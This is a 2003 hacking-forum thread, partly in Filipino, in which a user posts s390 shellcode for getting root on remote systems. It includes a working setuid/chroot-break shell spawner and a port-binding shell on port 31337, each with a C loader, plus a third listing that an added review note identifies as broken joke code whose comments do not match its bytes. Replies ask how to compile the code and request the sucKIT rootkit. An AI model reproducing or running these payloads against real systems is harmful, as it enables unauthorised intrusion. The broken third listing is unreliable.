Post by Verbl Kint on Jun 12, 2003 13:58:46 GMT -5
A shellcode is basically a simple program to get you root on a remote system. Once you're in as root (or at least setuid) you can pretty much do anything you want with the box: modify the webpage, access the db backend, get passwords, whatever.
Listed below are recent good examples. Try to analyze the code to get an understanding on how it does what it does.
Kung meron pa sa inyo diyan na may mga shellcodes paki-share na lang din sa forum na to. Salamat! Happy hacking!
verbl
Post by Verbl Kint on Jun 12, 2003 14:02:30 GMT -5
/*
 * NOTE(review): forum listing, reproduced as posted.  The string below is
 * s390 machine code; the author's own disassembly in the trailing comments
 * is the only description of what it does (the header says setuid / setgid /
 * chroot break, and the last two literals spell "/bin/sh").  It is not
 * portable: the bytes mean nothing on any other architecture, and the loader
 * at the bottom jumps into a writable data array -- exactly the pattern a
 * non-executable data segment (NX / W^X) exists to stop.
 */
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free*/
/* setuid / setgid / chroot break*/
/* code jcyberpunk@thehackerschoice.com*/
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10"/* basr%r1,0*/
"\x41\x90\x10\x98"/* la%r9,152(%r1)*/
"\xa7\xa8\xfb\xb4"/* lhi%r10,-1100*/
"\xa7\x68\x04\x56"/* lhi%r6,1110*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x98"/* stc%r6,152(%r1)*/
"\x17\x22"/* xr%r2,%r2*/
"\x42\x20\x10\x9f"/* stc%r2,159(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\xa7\x68\x04\x7a"/* lhi%r6,1146*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x41\x20\x10\x9c"/* la%r2,156(%r1)*/
"\x17\x33"/* xr%r3,%r3*/
"\xa7\x68\x04\x73"/* lhi%r6,1139*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x41\x20\x10\x9c"/* la%r2,156(%r1)*/
"\xa7\x68\x04\x89"/* lhi%r6,1161*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\xa7\xb8\x05\x39"/* lhi%r11,1337*/
"\x1a\xba"/* ar%r11,%r10*/
"\xa7\x68\x04\x58"/* lhi%r6,1112*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x41\x20\x10\x9d"/* la%r2,157(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x46\xb0\x10\x58"/* bct%r11,88(%r1)*/
"\x41\x20\x10\x9e"/* la%r2,158(%r1)*/
"\xa7\x68\x04\x89"/* lhi%r6,1161*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x57"/* lhi%r6,1111*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x41\x20\x10\xa0"/* la%r2,160(%r1)*/
"\x50\x20\x10\xa8"/* st%r2,168(%r1)*/
"\x41\x30\x10\xa8"/* la%r3,168(%r1)*/
"\x17\x44"/* xr%r4,%r4*/
"\x42\x40\x10\xa7"/* stc%r4,167(%r1)*/
"\x50\x40\x10\xac"/* st%r4,172(%r1)*/
"\x41\x40\x10\xac"/* la%r4,172(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x0b\x17"/* svc 23 <--- after modification*/
"\x07\xfe"/* br%r14*/
"\x41\x2e\x2e\x5c"/* A..<---- used for mkdir,chroot,chdir*/
"\x2f\x62\x69\x6e"/* /bin*/
"\x2f\x73\x68\x5c";/* /sh\\*/
/*
 * Loader.  Casts the data array to a function pointer and calls it.  The
 * implicit-int return type of main() and the unprototyped "void (*z)()" are
 * pre-C99 style, which is why newer compilers reject or warn on this line;
 * converting a void* to a function pointer is not defined by ISO C either.
 */
main() { void (*z)()=(void*)shellcode; z(); }
Post by Verbl Kint on Jun 12, 2003 14:06:49 GMT -5
/*
 * NOTE(review): forum listing, reproduced as posted.  s390 machine code for
 * a port-binding shell; the author's disassembly in the trailing comments is
 * the only description of what it does.  The port is visible there
 * ("lhi %r3,31337") and the last two literals spell "/bin/sh".  From the
 * defender's side a fixed listening port like this is the obvious artefact:
 * it shows up in netstat / ss output and on any port scan.  Not portable to
 * other architectures, and the loader below executes out of a writable data
 * array, which a non-executable data segment (NX / W^X) is meant to stop.
 */
/*----------------------------------------------------------------------*/
/* s390 portbinding shellcode - svc opcode 0x0a free*/
/* code by jcyberpunk@thehackerschoice.com*/
/*----------------------------------------------------------------------*/
char shellcode[]=
"\x0d\x10"/* basr %r1,%r0*/
"\x41\x90\x10\xd4"/* la %r9,212(%r1)*/
"\xa7\x68\x04\x56"/* lhi %r6,1110*/
"\xa7\xa8\xfb\xb4"/* lhi %r10,-1100*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd4"/* stc %r6,212(%r1)*/
"\xa7\x28\x04\x4e"/* lhi %r2,1102*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x40\x20\xf0\x78"/* sth %r2,120(%r15)*/
"\xa7\x38\x7a\x69"/* lhi %r3,31337*/
"\x40\x30\xf0\x7a"/* sth %r3,122(%r15)*/
"\x17\x44"/* xr %r4,%r4*/
"\x50\x40\xf0\x7c"/* st %r4,124(%r15)*/
"\xa7\x38\x04\x4d"/* lhi %r3,1101*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x90\x24\xf0\x80"/* stm %r2,%r4,128(%r15)*/
"\xa7\x28\x04\x4d"/* lhi %r2,1101*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x72"/* lr %r7,%r2*/
"\x41\x30\xf0\x78"/* la %r3,120(%r15)*/
"\xa7\x88\x04\x5c"/* lhi %r8,1116*/
"\x1a\x8a"/* ar %r8,%r10*/
"\x18\x48"/* lr %r4,%r8*/
"\x90\x24\xf0\x80"/* stm %r2,%r4,128(%r15)*/
"\xa7\x28\x04\x4e"/* lhi %r2,1102*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x27"/* lr %r2,%r7*/
"\xa7\x38\x04\x4d"/* lhi %r3,1101*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x90\x23\xf0\x80"/* stm %r2,%r3,128(%r15)*/
"\xa7\x28\x04\x50"/* lhi %r2,1104*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x27"/* lr %r2,%r7*/
"\x41\x30\xf0\x78"/* la %r3,120(%r15)*/
"\x90\x23\xf0\x80"/* stm %r2,%r3,128(%r15)*/
"\x50\x80\xf0\x88"/* st %r8,136(%r15)*/
"\xa7\x28\x04\x51"/* lhi %r2,1105*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x8b"/* lhi %r6,1163*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd5"/* stc %r6,213(%r1)*/
"\xa7\x38\x04\x4e"/* lhi %r3,1102*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x3a\xff\xff"/* ahi %r3,-1*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x3a\xff\xff"/* ahi %r3,-1*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x57"/* lhi %r6,1111*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd5"/* stc %r6,213(%r1)*/
"\x41\x20\x10\xd8"/* la %r2,216(%r1)*/
"\x50\x20\x10\xe0"/* st %r2,224(%r1)*/
"\x41\x30\x10\xe0"/* la %r3,224(%r1)*/
"\x17\x44"/* xr %r4,%r4*/
"\x42\x40\x10\xdf"/* stc %r4,223(%r1)*/
"\x50\x40\x10\xe4"/* st %r4,228(%r1)*/
"\x41\x40\x10\xe4"/* la %r4,228(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x0b\x66"/* svc 102 <--- after modification*/
"\x07\xfe"/* br %r14*/
"\x2f\x62\x69\x6e"/* /bin*/
"\x2f\x73\x68\x5c";/* /sh\*/
/*
 * Loader.  Casts the data array to a function pointer and calls it.  The
 * implicit-int return type of main() and the unprototyped "void (*z)()" are
 * pre-C99 style, which is why newer compilers reject or warn on this line;
 * converting a void* to a function pointer is not defined by ISO C either.
 */
main() { void (*z)()=(void*)shellcode; z(); }
Post by Verbl Kint on Jun 12, 2003 14:13:54 GMT -5
/*
 * NOTE(review): this listing does not compile and does not match its own
 * comments; the header dates it 20030401 and it reads as a joke post, not as
 * working code.  Reproduced verbatim below.  Concretely:
 *  - the first and third #defines have lost their whitespace ("X10x000010",
 *    "X20x000002"), so X1 and X2 are never defined and morph() uses
 *    undeclared identifiers;
 *  - the per-byte comments disagree with the bytes, e.g. "\x50\x60" is
 *    labelled lhi %r6,1111 while the two listings above encode that
 *    instruction as "\xa7\x68\x04\x57";
 *  - morph() assigns to the array object itself (shellcode -= ...,
 *    shellcode ^= ...), which is a constraint violation, not a byte edit;
 *  - snprintf() is handed the byte array as its *format string* and an
 *    unsigned char buffer as its destination, and the final loop write()s
 *    to fd 0 (stdin) while reusing j after the first loop finished with it;
 *  - void main() is non-standard.
 */
/*---------------------------------------------------------------------- s390 shellcode 0xa0 / 0x0 free portbinding shellcode (polymorph / repeats itself every 32th copy) code plasmoid@thehackerschoice.com -- 20030401 ----------------------------------------------------------------------*/ #define X10x000010 /* Register (%r3) offset 1 */ #define X3 0x0000f4 /* Register (%r3) offset 3 */ #define X20x000002 /* Register (%r3) offset 2 */ #define BF 128 /* Internal buffer length */ #define LN 439 /* LN constant */ unsigned char shellcode[] = "\x09\x09\x60\x40" /* basr %r14,%r9 */ "\x50\x60"/* lhi %r6,1111 */ "\x2e\x27\x2f\x2c"/* ar %r6,%r10 */ "\x2d\x59\x22"/* stc %r6,153(%r1) */ "\x50\x60\x40"/* la %r2,160(%r1) */ "\x50\x60\x22"/* st %r2,168(%r1) */ "\x7e\x2d\x2e\xf4"/* la %r3,168(%r1) */ "\x09\x40\x50"/* xr %r4,%r4 */ "\x60\x40\x6c"/* stc %r4,167(%r1) */ "\x2e\x59\x50\x60"/* basr %r14,%r9 */ "\x40\x50\x60\x40"/* la %r2,156(%r1) */ "\x50\x60\x40\x50"/* xr %r3,%r3 */ "\x60\x40\x50"/* lhi %r6,1139 */ "\x5e\x2e\xf4"/* ar %r6,%r10 */ "\x09\x40\x50"/* stc %r6,153(%r1) <--- initialize */ "\x60\x40\x2f"/* st %r2,168(%r1) */ "\x5c\x40\x50"/* la %r3,168(%r1) */ "\x60\x40\x50"/* xr %r4,%r4 */ "\x60\x40\x50\x60"/* stc %r4,167(%r1) */ "\x40\x50\x60"/* basr %r14,%r9 */ "\x40\x50\x60"/* la %r2,156(%r1) */ "\x5f\x5c\x5f"/* xr %r3,%r3 */ "\x40\x50\x60"/* lhi %r6,1139 */ "\x40\x50\x60"/* ar %r6,%r10 */ "\x22\x25\x73\x21"/* stc %r6,153(%r1) */ "\x22\xf4\x09"/* basr %r14,%r9 */ "\x50\x60\x40"/* la %r2,156(%r1) <--- rotation */ "\x69\x60\x40"/* lhi %r6,1161 */ "\x50\x60\x40"/* ar %r6,%r10 */ "\x50\x60\x40\x50"/* stc %r6,153(%r1) */ "\x60\x40\x50\x5f"/* basr %r14,%r9 */ "\x5f\x5f\x2f"/* lhi %r11,1337 */ "\x22\x50\x60\x40"/* ar %r11,%r10 */ "\x22\x5c\xf4\x09"/* lhi %r6,1112 */ "\x60\x40\x50"/* ar %r6,%r10 */ "\x7c\x40\x50"/* stc %r6,153(%r1) */ "\x60\x40\x50"/* la %r2,157(%r1) */ "\x60\x40\x50"/* basr %r14,%r9 */ "\x60\x40\x2f\x22"/* bct %r11,88(%r1) <--- regs ok? 
*/ "\x40\x50\x60"/* la %r2,158(%r1) */ "\x22\x5c\x60\x40"/* lhi %r6,1161 */ "\x50\x6f\x40\x21"/* ar %r6,%r10 */ "\xf4\x09\x50"/* stc %r6,153(%r1) */ "\x60\x40\x6c"/* basr %r1,0 */ "\x60\x40\x50"/* la %r9,152(%r1) */ "\x60\x40\x50"/* lhi %r10,-1100 */ "\x60\x40\x50"/* lhi %r6,1110 */ "\x5d\x40\x50"/* ar %r6,%r10 */ "\x60\x40\x50"/* stc %r6,152(%r1) */ "\x6f\x40\x21\x5f"/* xr %r2,%r2 */ "\x5f\x2e\x2f\xf4"/* stc %r6,152(%r1) */ "\x09\x60\x40\x50\x60"/* xr %r2,%r2 */ "\x5c\x50\x5f\x40"/* stc %r2,159(%r1) */ "\x50\x5f\x40"/* basr %r14,%r9 <--- hal or ... */ "\x50\x60\x40"/* lhi %r6,1146 ... camp? */ "\x5c\x2e\x5f\x5f"/* ar %r6,%r10 */ "\x5f\x2e\x2f"/* stc %r6,153(%r1) */ "\x60\x40\x50"/* basr %r14,%r9 */ "\x60\x22\x7e"/* st %r4,172(%r1) */ "\x5c\xf4\x09\x60"/* basr %r14,%r9 <--- reset cnt */ "\x40\x50\x60\x40"/* lhi %r6,1146 */ "\x58\x60\x5c"/* ar %r6,%r10 */ "\x2f\x60\x5c"/* stc %r6,153(%r1) */ "\x50\x60\x40"/* basr %r14,%r9 */ "\x50\x60\x40"/* st %r4,172(%r1) */ "\x50\x60\x40"/* la %r4,172(%r1) */ "\x50\x60\x40"/* basr %r14,%r9 */ "\x5f\x5f\x5f\x2e\x2f"/* svc 23 <--- spawn shell */ "\xf4\x09\x60"/* lhi %r6,1161 */ "\x40\x50\x60"/* ar %r6,%r10 <--- acquire lck */ "\x28\x50\x5c\x40"/* stc %r6,153(%r1) */ "\x5f\x5f\x5f"/* basr %r14,%r9 */ "\x2e\x60\x40"/* lhi %r11,1337 */ "\x50\x5f\x2e"/* ar %r11,%r10 */ "\x2e\x2d\x2d"/* lhi %r6,1112 */ "\x7e\x7e\x22\x50"/* ar %r6,%r10 */ "\x60\x40\x7e\x2d\x2e"/* stc %r6,153(%r1) */ "\xf4\x09\x40\x50"/* la %r2,157(%r1) */ "\x60\x40\x50\x60"/* basr %r14,%r9 */ "\x5a\x2c\x2d"/* bct %r11,88(%r1) */ "\x2d\x50\x60\x40"/* la %r2,158(%r1) */ "\x2f\x60\x40\x50"/* lhi %r6,1161 */ "\x60\x40\x50"/* ar %r6,%r10 */ "\x60\x40\x50\x60"/* stc %r6,153(%r1) */ "\x40\x50\x60"/* basr %r1,0 <--- release lck */ "\x40\x50\x5c\xf4"/* la %r9,152(%r1) */ "\x09\x60\x40\x50"/* lhi %r10,-1100 */ "\x60\x40\x50"/* lhi %r6,1110 */ "\x60\x5c\x5f"/* ar %r6,%r10 */ "\x5f\x2e\x50\x60"/* stc %r6,152(%r1) */ "\x28\x50\x60"/* xr %r2,%r2 */ "\x40\x2f\x60\x40\x50"/* stc 
%r6,152(%r1) */ "\x60\x40\x50\x60"/* xr %r2,%r2 */ "\x5f\x5f\x5f\x5f"/* stc %r2,159(%r1) */ "\x5f\x5f\x29\xf4"/* basr %r14,%r9 */ "\x09\x09\x50"/* lhi %r6,1146 */ "\x5c\x40\x50"/* ar %r6,%r10 */ "\x60\x6c\x50"/* stc %r6,153(%r1) */ "\x60\x2f\x2d\x2d"/* basr %r14,%r9 */ "\x2d\x2d\x2d\x7e"/* st %r4,172(%r1) */ "\x7e\x22\x40"/* basr %r14,%r9 */ "\x2f\x60\x40"/* lhi %r6,1146 */ "\x50\x60\x40\x50\x2d"/* ar %r6,%r10 */ "\x25\x73\xf4\x09"/* stc %r6,153(%r1) */ "\x09\x60\x40"/* basr %r14,%r9 */ "\x59\x60\x40"/* st %r4,172(%r1) */ "\x50\x5c\x40"/* la %r4,172(%r1) */ "\x50\x60\x40\x50"/* basr %r14,%r9 */ "\x60\x40\x50\x60\x40"/* svc 23 <--- fork */ "\x2f\xf4\x09\x09"/* lhi %r6,1161 */ "\x60\x40\x7c\x60"/* ar %r6,%r10 */ "\x40\x50\x60\x22"/* stc %r6,153(%r1) */ "\x78\x5f\x5f"/* basr %r14,%r9 */ "\x5f\x5f\x5f\x5f"/* lhi %r11,1337 */ "\x2e\x5e\xf4"/* ar %r11,%r10 */ "\x09\x09\x50\x60"/* lhi %r6,1112 */ "\x7c\x50\x60\x40"/* ar %r6,%r10 */ "\x50\x60\x40\x50"/* .data */ "\x60\x40\x50"/* la %r2,157 self-modifying code */ "\x60\x5c\x50"/* basr %r14,%r9 snippet following: */ "\x60\x40\xf4"/* bct %r11,88(%r1) ^ */ "\x09\x09\x50\x60"/* la %r2,158(%r1) | */ "\x6a\x50\x60"/* lhi %r6,1161 | */ "\x40\x50\x60"/* ar %r6,%r10 v */ "\x40\x50\x60\x40"/* stc %r6,153(%r1) */ "\x50\x60\x40"/* /bin/sh strings */ "\x59\x60\x25\x73";/* eof\\ */ void morph() { int i, j; unsigned char b[LN + BF]; /* * Rotate registers */ for (i = 0, j = 0; i <= LN - 1; i++, j = (j + 1) % 3) { if (!(shellcode - ((j + X2) * X1 + X2 * X1))) shellcode -= (j + X2) * X1; if (!(shellcode - X3)) shellcode ^= 0xfe; } /* * Scramble pseudo instructions */ snprintf(b, LN + BF - 1, shellcode, "\x44\x6f\x68", "\x52\x6f\x77", "\n"); /* * Shift register offsets */ for (i = 0; i <= LN; i++, write(0, &b, 1)) if (!(shellcode - ((j + X2) * X1 + X2 * X1))) shellcode -= (j + 1) % (j + X2) * X1 + X2 * X1; } void main() { morph(); }
Post by fr33ag3nt on Jun 14, 2003 12:39:57 GMT -5
nice post..... tutorial naman jan. hehe
Post by 3razZz3r on Nov 27, 2003 5:07:37 GMT -5
How do I use these SHELLCODES? Do I simply compile them and run them in the unix shell using "any" ID?
Post by Verbl Kint on Dec 2, 2003 14:47:08 GMT -5
Yes, you would have to compile them using cc or gcc. You might need to modify them, though, as I think these were designed to compile on gcc versions earlier than 2.95, so there could be some problems getting them to compile correctly on newer versions.
Kung may kopya kayo ng sucKIT rootkit please post niyo naman or at least provide the url, thanks.
Post by kkakenny on Jun 22, 2004 10:58:04 GMT -5
Nice shell codes. Buti you're willing to share hehe